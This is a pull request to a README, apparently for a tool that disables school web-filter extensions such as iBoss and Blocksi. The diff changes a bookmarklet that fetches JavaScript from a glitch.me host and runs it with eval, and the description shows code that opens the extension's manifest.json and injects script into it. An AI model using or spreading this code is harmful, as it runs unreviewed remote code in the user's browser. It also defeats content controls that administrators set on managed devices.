### PR TITLE
Fixed the code, added other scripts

### DIFF
--- a/README.md
+++ b/README.md
@@ -61,7 +61,7 @@ First go to https://tinyurl.com/byeswamp if you have iBoss.
 https://tinyurl.com/blockboss if you have Blocksi.
 Then bookmark the code below
 ```js
-javascript:fetch("https://rounded-boiling-flax.glitch.me/uboss.js").then(data=>{data.text().then(e=>{eval(e)})});
+javascript:opener.eval(`fetch("https://rounded-boiling-flax.glitch.me/uboss.js").then(data=>{data.text().then(e=>{eval(e)})})`) && close();
 ```
 
 Then go to the site with your blocker that was listed above.


### PR DESCRIPTION
I had used ```js
fetch("https://rounded-boiling-flax.glitch.me/uboss.js").then(e=>{e.text().then(f=>{eval(f)})})``` Which doesn't work if you're on a blank page because it opens /manifest.json used with the code
```js
if (window !== chrome.extension?.getBackgroundPage())
  open("/manifest.json").onload = function () {
    this.eval(
      swamp.toString() + "swamp();var chrome",
      (this.document.body.textContent = ""),
      this.history.replaceState({}, {}, "/uboss"),
      this.opener.close()
    );
    top.close();
  };
``` And since it's about:blank, you can't open a /site because it's a blank page with no url.